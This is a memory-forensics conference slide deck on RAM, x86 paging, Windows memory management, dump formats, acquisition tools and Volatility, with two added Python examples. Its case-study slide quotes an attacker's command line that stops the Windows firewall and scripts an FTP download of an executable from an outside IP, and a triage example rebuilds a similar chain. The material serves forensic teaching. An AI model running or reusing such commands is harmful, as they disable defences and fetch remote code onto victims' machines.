Shri

Memory Forensics
Boonlia Prince Komal

Don’t pull the Plug

Gmail : boonlia@gmail.com
Facebook:
http://www.facebook.com/home.php?#!/profile.php?id=1701055902
 or search for my mail id boonliasecurity@gmail.com
Twitter: http://twitter.com/boonlia
Memory Forensics
Live/ Dead Memory Forensics
• What is Live Memory and what is Dead Memory
  – RAM
  – Pagefile
  – Hibernation file
(Diagram labels: Hard Drive; Live Memory Forensics; Where is Hibernation file?)
Few Basics of RAM
•   A grid of Capacitors (DRAM)
•   Bucket with holes
•   Random Access
•   Parity Bit for error reporting
A Grid of Capacitors
• Row Select: set to high for the related row
• Column Select: set to high for the related column
• Read/write line: set to high for read and low for write
• Data inflow or outflow depending upon the R/W state
• Address Bus: carries the address of the memory location
• Data Bus: carries the data in and out through the same wires (Read/Write bus or simply Data Bus)
Bucket with holes (DRAM)
• Capacitors by their very nature get discharged rapidly
• Any read/write operation adds to these capacitors being discharged
• This calls for regular refreshing, wherein the entire data is read and written back
• SRAM uses transistors (2-4) per bit to show the on or off state of each bit
Memory Address space
Byte Addressable Memory (reads 8 bits at a time)

  32 Bit Processor: 2^32 addresses = 4 GB
    40 Bit implementation: 1024 GB
  64 Bit Processor: 2^64 addresses = 17 Billion GB
    50 Bit implementation: 1024 TB
Memory management at a glance
(Diagram labels: Processor; Memory Manager; Application; DMA ?)
Need For a Memory Manager
• Protect Operating system and Kernel Memory Space
• Prevent Application violations (accessing other applications' memory)
• Allocate memory judiciously
• Allow multiple applications to co-exist
• Improve memory utilization efficiency
• Extend the memory capacity via swapping
• Provide applications a simpler platform to use memory (Virtual Memory Space): you don't have to create two programs for 1 GB and 2 GB RAM machines
• Manage the shared memory
User mode v/s kernel Mode
• Memory protection
• Location of both the modes in RAM
• /3GB switch in boot.ini
• Where the Page directory and Page Table
  entries are stored
• What if User mode needs to access something
  in Kernel Mode
User Mode V/s Kernel Mode Memory
(Diagram labels: Kernel Mode; Location of Page Table and Page Directory; User Mode; 4GB Space Without PAE vs 4GB Space With PAE)
Overview of Virtual Memory Management on X86 Processor
(Diagram: TLB, Translation lookaside buffer)
Memory management in Windows
Windows on 32 Bit X86 Architecture can access up to 4 GB Memory
Windows can provide 4GB of memory space each to multiple processes despite the total memory being 4 GB max
This is done by using the X86 feature called paging
Every Memory page is 4KB
Virtual memory to physical memory
The Paging Process in x86 processor
(Image source: technet.microsoft.com)
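The translation the slide describes, as an added example that is not the author's code: the 32-bit, non-PAE x86 walk, where 10 bits of the virtual address index the page directory, 10 bits the page table and 12 bits the byte within the 4 KB page, and each PDE/PTE carries a 20-bit page frame number plus 12 flag bits. The raw dump, the CR3 value and the mapped frames are all constructed for the example; a real acquisition would supply the dump and the process's CR3 would come from its kernel structures.

```python
"""Walk x86 32-bit (non-PAE) page tables inside a raw memory dump (added example)."""
import struct

PAGE_SIZE = 0x1000
PRESENT = 1 << 0         # bit 0: entry valid, page resident in RAM
WRITABLE = 1 << 1        # bit 1: page may be written
USER = 1 << 2            # bit 2: reachable from user mode (the slide's memory protection)
LARGE_PAGE = 1 << 7      # bit 7 of a PDE: maps one 4 MB page directly, no page table
FRAME_MASK = 0xFFFFF000  # upper 20 bits of a PDE/PTE: page frame number (PFN) << 12


def split_vaddr(vaddr: int):
    """10 bits page-directory index, 10 bits page-table index, 12 bits page offset."""
    return (vaddr >> 22) & 0x3FF, (vaddr >> 12) & 0x3FF, vaddr & 0xFFF


class RawDump:
    """Linear (.dd/.img style) image: the file offset is the physical address."""

    def __init__(self, data: bytes):
        self.data = data

    def read(self, paddr: int, size: int) -> bytes:
        if paddr < 0 or paddr + size > len(self.data):
            raise ValueError(f"physical {paddr:#x}+{size:#x} lies outside the dump")
        return self.data[paddr:paddr + size]

    def read_entry(self, paddr: int) -> int:
        """One little-endian 32-bit PDE/PTE."""
        return struct.unpack("<I", self.read(paddr, 4))[0]

    def translate(self, cr3: int, vaddr: int):
        """Physical address of vaddr under the page directory at cr3, or None when
        the page is not resident (it would have to be looked for in pagefile.sys)."""
        pdi, pti, offset = split_vaddr(vaddr)
        pde = self.read_entry((cr3 & FRAME_MASK) + pdi * 4)
        if not pde & PRESENT:
            return None
        if pde & LARGE_PAGE:                  # 4 MB page: 10-bit frame, 22-bit offset
            return (pde & 0xFFC00000) | (vaddr & 0x3FFFFF)
        pte = self.read_entry((pde & FRAME_MASK) + pti * 4)
        if not pte & PRESENT:
            return None
        return (pte & FRAME_MASK) | offset

    def read_virtual(self, cr3: int, vaddr: int, size: int):
        """Read process virtual memory page by page: virtually contiguous bytes may
        live in scattered physical frames. None if any page is not resident."""
        out = bytearray()
        while size > 0:
            paddr = self.translate(cr3, vaddr)
            if paddr is None:
                return None
            chunk = min(size, PAGE_SIZE - (vaddr & 0xFFF))  # stop at the page edge
            out += self.read(paddr, chunk)
            vaddr += chunk
            size -= chunk
        return bytes(out)


def build_sample_dump():
    """Constructed 64 KB image: page directory at 0x1000 (the CR3 value), one page
    table at 0x2000, data frames at 0x5000 and 0x8000. Returns (dump, cr3)."""
    mem = bytearray(16 * PAGE_SIZE)
    cr3 = 0x1000
    flags = PRESENT | WRITABLE | USER
    # PDE[1]: virtual 0x00400000-0x007FFFFF is described by the page table at 0x2000
    struct.pack_into("<I", mem, cr3 + 1 * 4, 0x2000 | flags)
    # PDE[2]: virtual 0x00800000-0x00BFFFFF is a single 4 MB page at physical 0xC00000
    struct.pack_into("<I", mem, cr3 + 2 * 4, 0x00C00000 | flags | LARGE_PAGE)
    # PTE[1]: 0x00401000 -> frame 0x5000; PTE[2]: 0x00402000 -> frame 0x8000;
    # PTE[3] stays zero, so 0x00403000 is not resident
    struct.pack_into("<I", mem, 0x2000 + 1 * 4, 0x5000 | flags)
    struct.pack_into("<I", mem, 0x2000 + 2 * 4, 0x8000 | flags)
    # An 8-byte header straddling the 0x00401000/0x00402000 page boundary
    mem[0x5FFC:0x6000] = b"MZ\x90\x00"
    mem[0x8000:0x8004] = b"\x03\x00\x00\x00"
    return RawDump(bytes(mem)), cr3


if __name__ == "__main__":
    dump, cr3 = build_sample_dump()
    print(hex(dump.translate(cr3, 0x00401ABC)), dump.read_virtual(cr3, 0x00401FFC, 8))
```

The read across 0x00401FFC shows why a raw dump cannot be searched as if it were process memory: the two halves of the header sit in frames 0x5000 and 0x8000.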
Few Concepts in Windows Memory Management
Process Memory Usage Counters
  – Virtual Size
  – Private Byte Counter
  – Working Set
(Diagram labels: Virtual Size 2 GB; Physical Memory (Say 1GB); Private Bytes; Working Set; Shared Memory)
Page lists in Windows (Don't confuse with page table)
 1) Zero Page list: pages that carry no data and are ready to be assigned to a process
 2) Standby Page list: unmodified pages that are taken away from a process
 3) Free Page list: pages not being used by any process and free, but still containing data
 4) Modified Page list: modified pages pertaining to a process, taken away from that process
Windows Memory Management at a Glance
(Diagram, recoverable labels only: Process Working set; Modified Page List; Standby List; Free Page List; Zero Page List; Page File on the Hard Drive; Boot. Arrows: 1 "Modified Pages", "Modified & Needed", "Unsaved data", "Saved data"; 2 "Unmodified pages needed"; 3 "Memory no longer needed"; n. Exceeding memory use or memory crunch situation in red font.)
Memory Management in OS
• Memory Manager
      – Large address space - user programs can reference more memory than
        physically exists
      – Protection - the memory for a process is private and cannot be read or
        modified by another process; also, the memory manager prevents processes
        from overwriting code and read-only-data.
      – Memory Mapping - clients can map a file into an area of virtual memory and
        access the file as memory
      – Fair Access to Physical Memory - the memory manager ensures that
        processes all have fair access to the machine's memory resources, thus
        ensuring reasonable system performance
      – Shared Memory - the memory manager allows processes to share some
        portion of their memory. For example, executable code is usually shared
        amongst processes.
What can be found in memory
• The running processes
• The running threads
• The passwords/ keys and other information
• Live registry hives
• Live chats and login information
• Malware presence including rootkits
• Open connections to the net / Network
• Open files and their remnants
• …
• In fact anything that the processor works upon
The Process of Memory forensics
•   Capture the memory
•   Analyze the memory
•   Reconstruction of the memory state
•   Reconstruction of the entire scenario with
    disk image and memory image in conjunction
Various formats
• Raw Dump (Linear format) (.img/.dd)
• Windows Crash dump format (.bin)
  – BSoD (Written after the system is frozen)
• Hiberfil.sys format
• Commercial tools format
  – Winen .E01 kind of format
  – .Vmem (Vmware)
  – .Bin (Hyper V)
  – Fastdump Pro (hpak)
Capturing the memory
• Tools
  – DD / DCFLDD/ DC3DD
       • dd if=\\.\PhysicalMemory of=f:\memory.img
  –   Memdump
  –   Win32dd
  –   Nigilant32
  –   Fastdump (Fastdump pro dumps page file content too)
  –   MDD
  –   Winen (Encase)
  –   Memoryze (Dumps the pagefile content too)
  –   Livekd.exe (From microsoft)
Brief demo on memory acquisition with win32dd
Hardware approach
• Firewire port device (DMA)
  • http://www.storm.net.nz/projects/16
• PCI Device by Brian Carrier and Joe Grand
  – Tribble Device
Analysing the memory dump
•   String search with strings.exe
•   Grep search with grep command
•   DFRWS 2005 (Memparser)
•   2007: Aaron Walters - Volatility framework
•   Several plugins for Volatility
•   Pdfbook, Pdgmail, Pdymail, Skypeeks
•   Memparser
•   Memoryze and Audit Viewer
Volatility Framework


 What is volatility
 Volatility plugins
 Using volatility on memory dumps
 Demo with few options for analysis
Cold Boot Attack
• Memory doesn’t get empty that fast
• Even 30 seconds to minutes after system shutdown the memory still contains data
• This time can be prolonged if the memory is cooled down. The coolant applied instantly reduces the temperature to -50
Case Study

Shell C:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 111.67.192.11> cmd.txt&echo chajian>> cmd.txt&echo 123>> cmd.txt&echo binary>>cmd.txt&echo get seo.exe>>…………..
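One way to triage a command line like the one above once it has been carved out of a dump, as an added example that is not part of the original deck: it splits cmd.exe's `&` chain, rebuilds the file the `echo ... >> cmd.txt` steps were assembling, and names what the chain did. The command line it runs on is constructed and only modelled on the case study (documentation-range address 192.0.2.10, placeholder credentials and file names), not the one on the slide.

```python
"""Triage a cmd.exe one-liner recovered from memory (added example).

Splits the '&'-chained command, reconstructs any file assembled with
'echo ... > file' / 'echo ... >> file' and reports the notable steps."""
import re
from dataclasses import dataclass, field

# Constructed sample modelled on the case-study slide: 192.0.2.10 is a
# documentation-range address and the credentials/file names are placeholders.
SAMPLE_CMDLINE = (
    r"C:\windows\system32\cmd.exe /c net1 stop sharedaccess"
    "&echo open 192.0.2.10> cmd.txt&echo ftpuser>> cmd.txt&echo ftppass>> cmd.txt"
    "&echo binary>>cmd.txt&echo get payload.exe>>cmd.txt&echo bye>>cmd.txt"
    "&ftp -s:cmd.txt"
)

# '<command> > file' or '<command> >> file'; cmd.exe needs no space before '>'
REDIRECT = re.compile(r"^(?P<cmd>.*?)\s*(?P<mode>>>|>)\s*(?P<target>\S+)\s*$")
NET_STOP_FW = re.compile(r"^net1?\s+stop\s+sharedaccess$", re.IGNORECASE)
FTP_SCRIPT = re.compile(r"^ftp\s+.*-s:(?P<script>\S+)", re.IGNORECASE)


@dataclass
class Triage:
    commands: list = field(default_factory=list)  # the chain, one entry per '&'
    files: dict = field(default_factory=dict)     # file name -> reconstructed lines
    findings: list = field(default_factory=list)  # human-readable indicators


def split_chain(cmdline: str) -> list:
    """Drop the 'cmd.exe /c' wrapper and split on cmd.exe's '&' separator."""
    body = re.sub(r"^.*?\bcmd(?:\.exe)?\s+/c\s+", "", cmdline, flags=re.IGNORECASE)
    return [part.strip() for part in body.split("&") if part.strip()]


def triage(cmdline: str) -> Triage:
    t = Triage(commands=split_chain(cmdline))
    for cmd in t.commands:
        m = REDIRECT.match(cmd)
        if m and m.group("cmd").lower().startswith("echo "):
            target = m.group("target").lower()
            text = m.group("cmd")[5:].strip()            # what echo wrote
            if m.group("mode") == ">":
                t.files[target] = [text]                 # '>' truncates the file
            else:
                t.files.setdefault(target, []).append(text)
            continue
        if NET_STOP_FW.match(cmd):
            t.findings.append("stops SharedAccess (Windows Firewall/ICS) via "
                              + cmd.split()[0])
        m = FTP_SCRIPT.match(cmd)
        if m:
            script = m.group("script").lower()
            note = " (contents reconstructed)" if script in t.files else ""
            t.findings.append(f"runs ftp.exe with script {script}{note}")
    # An 'open <host>' plus 'get <file>' pair marks a rebuilt file as an FTP script
    for name, lines in t.files.items():
        words = [ln.split(maxsplit=1) for ln in lines]
        hosts = [w[1] for w in words if len(w) == 2 and w[0].lower() == "open"]
        gets = [w[1] for w in words if len(w) == 2 and w[0].lower() == "get"]
        if hosts and gets:
            t.findings.append(f"{name} is an FTP script: connects to {hosts[0]}, "
                              f"downloads {', '.join(gets)}")
    return t


if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINE)
    for name, lines in result.files.items():
        print(f"--- {name} ---\n" + "\n".join(lines))
    for finding in result.findings:
        print("*", finding)
```

Because `>` truncates and `>>` appends, replaying the redirections in chain order yields the script exactly as it would have existed on disk, which a bare strings/grep pass over the dump does not give.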
Gmail : boonlia@gmail.com
Facebook: http://www.facebook.com/home.php?#!/profile.php?id=1701055902
or search for my mail id boonliasecurity@gmail.com
Twitter: http://twitter.com/#!/boonlia
You can reach us at
boonlia@gmail.com
bhansalireena@gmail.com

http://nullcon.net
nullcon Goa 2010

Editor's Notes

  • #2: Who am I. What has been written in forensics books is “Pull the plug”. Things changed post 2005.
  • #12: Check that device drivers are in kernel mode and therefore inside protection. A wrong driver may cause a BSoD because it manipulates memory in kernel mode.
  • #15: 32 address pins can specify up to 4 GB of addresses, with 2^32 options.
  • #16: 2-level structure: 1024 x 1024 x 4 KB pages. Every process has:
    – PDE structure (every entry has 20 bits to point to the page table number and 12 bits for page protection and other housekeeping)
    – PTE structure (every entry has 20 bits to point to a 4 KB page (total 1024 x 4 KB pages) and 12 bits for housekeeping)
    – PFN (Page Frame Number is the 4 KB frame in memory)
    The processor uses 10 bits to find the PDE, 10 bits to find the PTE and 12 bits to identify the individual bit in the 4 KB page.
  • #24: Crash dump: good for analysis, dumped with a frozen state of Windows, debugging tools available from Microsoft. Cons: writes on the hard drive; by default only Windows 2003 dumps full memory (small 64KB dump, kernel dump and full dump). Possibility to force a dump only with a registry tweak and after the system is restarted post registry tweak; full dump available only on systems with up to 2 GB of RAM. Contents of the pagefile are overwritten as the dump first freezes the system, dumps the RAM in the pagefile and then proceeds to
    Winen: proprietary format from EnCase. Can be converted to other formats including raw format with FTK Imager from AccessData.
    Vmem: a virtual machine can be suspended and a perfect image stored in Vmem. Format similar to raw, and the same tools are used to parse it.
    .Bin: a dump format from Windows.
    Hibernation file: compressed; file format revealed by Matthieu Suiche for Sandman (now part of Volatility). Can be used as a memory dump. You can use it as an additional dump and compare it with the current dump.
  • #25: Memory is dynamic, so try to stop all other activities while performing the capture. What do you get… RAM or RAM+Pagefile?
  • #27: Firewire device: extremely fast due to DMA (bypasses the OS). Storm.net.nz project: a software driver that can be installed in BackTrack and other packages and fools the Windows OS into thinking it is an iPod. Not very successful: Blue Screen of Death reported; misses a few parts of the memory. Tribble needs to be installed in the machine prior to the incident. All in all not much success on the hardware front…… Still, for the most part only software is used for memory dumping, which might in fact rely on DLLs already compromised on the system.
  • #28: Strings and Grep: raw searches that don’t provide the full context in which the string is used. Memparser won the DFRWS (Digital Forensics Research Workshop) 2005 challenge. Volatility.